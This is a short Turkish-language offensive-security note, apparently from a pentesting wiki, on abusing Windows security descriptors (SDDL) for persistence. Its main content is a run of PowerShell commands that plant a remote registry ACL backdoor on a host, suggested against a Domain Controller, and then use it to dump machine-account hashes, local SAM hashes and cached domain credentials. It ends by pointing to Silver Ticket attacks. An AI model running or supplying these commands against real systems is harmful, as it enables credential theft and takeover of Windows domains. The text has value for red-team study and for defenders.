Dökümantasyondan: Güvenlik Tanımlayıcı Tanım Dili (SDDL), bir güvenlik tanımlayıcısını açıklamak için kullanılan formattır. SDDL, DACL ve SACL için ACE dizelerini kullanır: ace_türü;ace_bayrakları;izinler;nesne_kılavuzu;miras_alınan_nesne_kılavuzu;hesap_sid;
Güvenlik tanımlayıcıları, bir nesnenin üzerinde sahip olduğu izinleri depolamak için kullanılır. Bir nesnenin güvenlik tanımlayıcısında sadece küçük bir değişiklik yapabilirseniz, ayrıcalıklı bir gruba üye olmadan o nesne üzerinde çok ilginç ayrıcalıklar elde edebilirsiniz.
Bu kalıcılık tekniği, genellikle yönetici ayrıcalıklarını gerektiren bir görevi yönetici olmadan gerçekleştirebilmek için belirli nesneler üzerinde gereken her ayrıcalığı kazanma yeteneğine dayanır.
WMI Erişimi
Bir kullanıcıya uzaktan WMI yürütme erişimi sağlayabilirsiniz bunu kullanarak:
Kayıt defterine erişin ve hash'leri dökün, DAMP kullanarak bir Reg arka kapısı oluşturun, böylece herhangi bir zamanda bilgisayarın hash'ini, SAM'i ve bilgisayarda önbelleğe alınmış herhangi bir AD kimlik bilgisini alabilirsiniz. Bu nedenle, bu izni bir düzenli kullanıcıya bir Etki Alanı Denetleyici bilgisayarı karşısında vermek çok faydalıdır:
# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor-ComputerName<remotehost>-Trusteestudent1-Verbose# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash-ComputerName<remotehost>-Verbose# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash-ComputerName<remotehost>-Verbose# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential-ComputerName<remotehost>-Verbose
Güvenlik Tanımlayıcıları
Bir Etki Alanı Denetleyicisinin bilgisayar hesabının karma değerini nasıl kullanabileceğinizi öğrenmek için Gümüş Biletler'e bakın.